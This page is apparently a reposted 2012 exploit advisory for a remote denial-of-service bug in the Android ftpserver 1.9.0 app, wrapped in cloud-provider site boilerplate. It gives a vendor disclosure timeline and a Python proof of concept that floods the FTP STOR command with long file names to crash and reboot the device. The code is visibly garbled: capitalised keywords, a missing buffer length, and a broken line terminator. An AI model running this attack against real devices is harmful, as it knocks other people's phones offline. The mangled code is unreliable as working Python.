Home > Developer > Mobile Develop

[Security_android] Android ftpserver 1.9.0-remote DoS Code Analysis

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

# Exploit title:android ftpserver 1.9.0 Remote DoS
# DATE:03/20/12
# AUTHOR:G13
# Twitter: @g13net
# software site:https://sites.google.com/site/andreasliebigapps/ftpserver/
# Download link:http://www.g13net.com/ftpserver.apk
# version:1.9.0
# Category:dos (Android)
#

##### Vulnerability #####

Ftpserver is vulnerable to a DoS condition when long file names be
Repeatedly attempted to be written via the STOR command.

Successful exploitation would causes devices to restart.

Android Security Team has confirmed this issue.

I have been able to test this exploit against Android 2.2 and 2.3.
4.0 (ICS) appears is vulnerable.

##### Vendor Timeline #####

Android Security Team:
10/20/11-vendor notified of vulnerability, Vendor notifies me they would
Be looking to the issue
10/21/11-vendor requests bug report from device, bug report sent, PoC
Code delivered to Vendor
10/24/11-asked Vendor Status, stated I has been able to duplicate issue
On multiple devices
10/25/11-vendor states they is still working on it
10/30/11-current Status asked
10/31/11-vendor Replies No Updates
11/7/11-emailed Vendor, they ask for more clarification on issue. I
Submit more details
11/8/11-vendor acknowledges that it's not the APK itself causing the
Crashes. Vendor also confirms full reboots from PoC code.
11/9/11-vendor asks if I am just crashing application or device in
Certain instances. I state device is restarting.
11/11/11-i ask if there is anything more I could assist with. Vendor
States they has isolated the impacted component and is working on a
Fix.
11/18/11-current status asked.
12/8/11-update requested, response that they would contact Kernel team for
An update
01/13/12-current status asked, no response
03/06/12-current status asked, no response
03/20/12-disclosure

Developer:
1/24/12-developer contacted
1/25/12-developer responds
1/27/12-supplied Developer with PoC code, Developer confirms issue
1/29/12-developer releases new version
3/20/12-disclosure

##### PoC #####

#!/usr/bin/python
# Android Ftpserver PoC Device Crash

Import socket

s = socket.socket (socket.af_inet, socket. SOCK_STREAM)

Buffer = "STOR" + "A" * + + "\ r \ n"
For x in Xrange (1,31):
s = socket.socket (socket.af_inet, socket. SOCK_STREAM)
Print X
S.connect (' 172.16.30.108 ', 2121)

DATA=S.RECV (1024)
S.send ("USER test\r\n")
DATA=S.RECV (1024)
S.send ("PASS test\r\n")

S.send (buffer)

S.send ("QUIT")

S.close ()

[Security_android] Android ftpserver 1.9.0-remote DoS Code Analysis

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
java code analysis tools coverity code analysis coverity static code analysis pmd static code analysis checkmarx code analysis klocwork static code analysis resharper code analysis

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More